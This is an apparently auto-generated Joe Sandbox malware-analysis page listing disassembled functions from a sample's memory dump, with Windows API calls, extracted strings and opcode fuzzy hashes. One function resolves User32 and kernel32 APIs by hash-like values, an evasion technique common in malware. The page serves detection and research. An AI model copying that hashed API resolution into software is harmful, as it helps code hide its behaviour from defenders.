Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 6d8205ec7fe6a3e7551321dc0cd60118b5c6c9ae9d4105806cac3e9092e37832
Instruction ID: 2be001c0fdac675dc3a0935e8215fba039d318498371d1a6fc25ce4b8add8a72
Opcode Fuzzy Hash: 6d8205ec7fe6a3e7551321dc0cd60118b5c6c9ae9d4105806cac3e9092e37832
Instruction Fuzzy Hash: F712E575A15705AFC758DB99DD84DAAB3B9BF8C300F14866CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE447D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE4480C
VariantInit.OLEAUT32(?), ref: 6CE44815
VariantInit.OLEAUT32(?), ref: 6CE4481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE44826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6CE4485B
VariantClear.OLEAUT32(?), ref: 6CE44868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE44974
VariantClear.OLEAUT32(?), ref: 6CE44984
VariantClear.OLEAUT32(?), ref: 6CE4498A
VariantClear.OLEAUT32(?), ref: 6CE44990

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 6e480e0993ce16ebc34a1667469cccac50dc3b43fa9921fc6ba17d55d2c6cbfa
Instruction ID: 14bda7d30a748be02e7aa4bd98f21fd137483b4bf4faf2562ff4be0402f957e2
Opcode Fuzzy Hash: 6e480e0993ce16ebc34a1667469cccac50dc3b43fa9921fc6ba17d55d2c6cbfa
Instruction Fuzzy Hash: 99513C72A002599FDB04DFE4DC80EAEB7B9FF89314F24856EE505EB640DB34A905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3DCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CE3DD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6CE3DD10
SafeArrayPutElement.OLEAUT32(00000000,6CE42FFF,?), ref: 6CE3DD47
VariantClear.OLEAUT32(?), ref: 6CE3DD4F
SafeArrayPutElement.OLEAUT32(00000000,6CE42FFF,?), ref: 6CE3DD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CE3DDA4
VariantClear.OLEAUT32(?), ref: 6CE3DDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE3DE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE3DE27
VariantClear.OLEAUT32(?), ref: 6CE3DE31

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: 1e43eda9fe71cc25cf8998b1368e82612567b1782b9327b89af39635f252aa9e
Instruction ID: d50abbd394bb81752e7d51c6cba5d8db9e71d69f340d9c652ada308947b3864a
Opcode Fuzzy Hash: 1e43eda9fe71cc25cf8998b1368e82612567b1782b9327b89af39635f252aa9e
Instruction Fuzzy Hash: FF516E76A01219AFDB01DFA5D884EDFBBB8FF59304F109159EA15A7350DB34EA01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3E120 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 364COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6CE3E29B
SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6CE3E2B6
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CE3E2D7

Part of subcall function 6CE45760: std::tr1::_Xweak.LIBCPMT ref: 6CE45769

SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CE3E309

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE3E523
InterlockedCompareExchange.KERNEL32(6CECC6A4,45524548,4B4F4F4C), ref: 6CE3E544

Strings

.l, xrefs: 6CE3E4DB, 6CE3E4FC, 6CE3E4DE
.l, xrefs: 6CE3E551

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
String ID: .l$ .l
API String ID: 2722669376-2945158243
Opcode ID: 25ed0abe9be53799697b0f76c852e2664768b4ee9e7daf7870b310f8499ee3b5
Instruction ID: b8220a43ae8ed86703d5e2a591c3730c63def159eb848794338bf6bd5720b4b4
Opcode Fuzzy Hash: 25ed0abe9be53799697b0f76c852e2664768b4ee9e7daf7870b310f8499ee3b5
Instruction Fuzzy Hash: 1DD1D471A01614AFDB00CFA4C884BEE77B9AF45308F345569E509AB780D775FD44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE5C213

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

Strings

gfff, xrefs: 6CE5C3A3
gfff, xrefs: 6CE5C222
gfff, xrefs: 6CE5C3F7
vector<T> too long, xrefs: 6CE5C20E
gfff, xrefs: 6CE5C2EA
gfff, xrefs: 6CE5C1F2
gfff, xrefs: 6CE5C259

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1823113695-1254974138
Opcode ID: 5f69ab49202197809620a427b178b3e7037191c160d0950596fe26da0fc70281
Instruction ID: c71a1d91880ab718d06e755e809971c3ed429850216be68a37572fbf351c5258
Opcode Fuzzy Hash: 5f69ab49202197809620a427b178b3e7037191c160d0950596fe26da0fc70281
Instruction Fuzzy Hash: EF9187B1A00209AFCB18CF59DD90EEEB7B9EB88314F54861DE919D7740D731BA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE30CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE30D3A
std::_Xinvalid_argument.LIBCPMT ref: 6CE30D60
_memmove.LIBCMT ref: 6CE30D95
std::_Xinvalid_argument.LIBCPMT ref: 6CE30DBF
_memmove.LIBCMT ref: 6CE30E3E

Strings

invalid string position, xrefs: 6CE30D35
string too long, xrefs: 6CE30D5B, 6CE30DBA

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 8586543a55d4f05929890fa49c2f255897eac4494bac489ba1fcdc2239ac48de
Instruction ID: 8a801dd611fa0ca0e30fe8a1769f57dd4476ca26976ea0c586ddda6f67ddd554
Opcode Fuzzy Hash: 8586543a55d4f05929890fa49c2f255897eac4494bac489ba1fcdc2239ac48de
Instruction Fuzzy Hash: AB51C2323011649BD725CE5DD880A5AB3FAEBC5714B709A2EE859CBB84DB70FC41C792

Uniqueness

Uniqueness Score: -1.00%

Function 6CE842B0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE842DD

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE84363
_memmove.LIBCMT ref: 6CE84381
_memmove.LIBCMT ref: 6CE843E6
_memmove.LIBCMT ref: 6CE84453
_memmove.LIBCMT ref: 6CE84474

Strings

lgl, xrefs: 6CE8442C, 6CE843CC, 6CE84343
vector<T> too long, xrefs: 6CE842D8

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: lgl$vector<T> too long
API String ID: 4034224661-3885013920
Opcode ID: fdafb2e43204dd8a7175282b38e27ef2b5c00b9ec35de151f719c71ff4b856ce
Instruction ID: 60c9cf2f9e3b8eb6e9973b5cf73ee0426194d97ded88129fc75fbfa40194fc18
Opcode Fuzzy Hash: fdafb2e43204dd8a7175282b38e27ef2b5c00b9ec35de151f719c71ff4b856ce
Instruction Fuzzy Hash: 715181B16052069FC718CF68DC8596BB7F9EBD4318F284E2DE94AC3744E671E904C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE51B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CE51C5E
LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6CE51C69
GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6CE51CA2
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6CE51CC1
LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6CE51CCC
GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6CE51D0A

Strings

User32.dll, xrefs: 6CE51C57, 6CE51C64
kernel32.dll, xrefs: 6CE51CBA, 6CE51CC7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID: User32.dll$kernel32.dll
API String ID: 310444273-1965990335
Opcode ID: d43524ae166b590928f697be07bc51ddd7a032b925bebda15da1c7370cfc75a2
Instruction ID: 9de01f62ff2a850ddd5e1b28f14d6d2e1f2b65a95e00eb1fd6ffcecbfd6e50ac
Opcode Fuzzy Hash: d43524ae166b590928f697be07bc51ddd7a032b925bebda15da1c7370cfc75a2
Instruction Fuzzy Hash: 86614B75600A009FC760CF98C182A6ABBF1FB46710FB08A5CD4969BF52D736E856CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6CE4C150 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CE4C180
SafeArrayPutElement.OLEAUT32(00000000,I7l,?), ref: 6CE4C1B8
VariantClear.OLEAUT32(?), ref: 6CE4C1C4
VariantCopy.OLEAUT32(I7l,?), ref: 6CE4C21B
VariantClear.OLEAUT32(?), ref: 6CE4C22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CE4C23E

Strings

I7l, xrefs: 6CE4C1B3, 6CE4C1CE, 6CE4C1B6
I7l, xrefs: 6CE4C20C, 6CE4C213

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID: I7l$I7l
API String ID: 3979206172-4116127961
Opcode ID: 207b2eaac83f64f02ec5cc0db76d9f081581e2426365e825ab16fd072a69167f
Instruction ID: 58f3623eb85ba37575eb913f104cb0ed520fb0ce48bf965853a2755c08263f0a
Opcode Fuzzy Hash: 207b2eaac83f64f02ec5cc0db76d9f081581e2426365e825ab16fd072a69167f
Instruction Fuzzy Hash: 7D314D76A00609EFDB00DFE9D884B9EBBB8EF59304F208559E915D7750EB31D905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6CE37370 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6CEA11FD,000000FF,?,6CE38B80,00000000,?,00000000,?,6CE38C13,?,?), ref: 6CE37415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6CEA11FD,000000FF,?,6CE38B80,00000000,?,00000000,?,6CE38C13,?,?), ref: 6CE3741B
std::exception::exception.LIBCMT ref: 6CE3743D
__CxxThrowException@8.LIBCMT ref: 6CE37452
std::exception::exception.LIBCMT ref: 6CE37461
__CxxThrowException@8.LIBCMT ref: 6CE37476

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE3744B
0Bl, xrefs: 6CE3746F

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID: 0Bl$0Bl
API String ID: 189561132-1774228455
Opcode ID: 71ef0dc8c004f9bfdaa8d6faed9b67a6db0e92e5f131fff3f1d91c5024b1e68e
Instruction ID: e257108f0414cdeb089a540b170dc77a1e5219fc6d11d674f45d46a56b83ee84
Opcode Fuzzy Hash: 71ef0dc8c004f9bfdaa8d6faed9b67a6db0e92e5f131fff3f1d91c5024b1e68e
Instruction Fuzzy Hash: DB316BB29016449FC751CF99C880A9AFBF4FF59310B64895EE85A97B40D770F504CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE94409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 6CE9442E

Part of subcall function 6CE93FC9: Replicator::operator[].LIBCMT ref: 6CE9404C
Part of subcall function 6CE93FC9: DName::operator+=.LIBCMT ref: 6CE94054

DName::operator+.LIBCMT ref: 6CE94487
DName::DName.LIBCMT ref: 6CE944DF

Strings

,<ellipsis>, xrefs: 6CE9447A, 6CE9447F
<ellipsis>, xrefs: 6CE944C9, 6CE944CE
..., xrefs: 6CE944C2
,..., xrefs: 6CE94473
void, xrefs: 6CE944D7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 30097b2c829ad5fb376567a828085fd03a4beb538729f6b7672654af12d764d6
Instruction ID: 60fd368242b74bd36d6efb4e2be30a3986879962ec0009803230cf67fbc841ac
Opcode Fuzzy Hash: 30097b2c829ad5fb376567a828085fd03a4beb538729f6b7672654af12d764d6
Instruction Fuzzy Hash: BB21A4B1701148AFCB01DF58C5419A97BF4EB4678DB2482A6E869DFB12CB34DA03CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE95D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 6CE95D40
DName::DName.LIBCMT ref: 6CE95D4C

Part of subcall function 6CE93B3B: DName::doPchar.LIBCMT ref: 6CE93B6C

UnDecorator::getScopedName.LIBCMT ref: 6CE95D8B
DName::operator+=.LIBCMT ref: 6CE95D95
DName::operator+=.LIBCMT ref: 6CE95DA4
DName::operator+=.LIBCMT ref: 6CE95DB0
DName::operator+=.LIBCMT ref: 6CE95DBD

Strings

void, xrefs: 6CE95D9C

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: a3017265a5c340bb840c58dabb5b0b13f348df6983ec3dec50160771bb4e08b0
Instruction ID: d3c65edadf760b8c425b03f4805e359ef1bf466fbe599319c955db4999c9d2f5
Opcode Fuzzy Hash: a3017265a5c340bb840c58dabb5b0b13f348df6983ec3dec50160771bb4e08b0
Instruction Fuzzy Hash: A411A971902208AFD705DB68C899BED7BB09B0130EF20419CD45AAB7A1DF709A4ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 6CE43F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE43F7B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE43F8D
VariantInit.OLEAUT32(?), ref: 6CE43FB7
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE43FD0
VariantClear.OLEAUT32(?), ref: 6CE440C9
VariantClear.OLEAUT32(?), ref: 6CE44105
SafeArrayDestroy.OLEAUT32(?), ref: 6CE44123
VariantClear.OLEAUT32(?), ref: 6CE44157
VariantClear.OLEAUT32(?), ref: 6CE44168

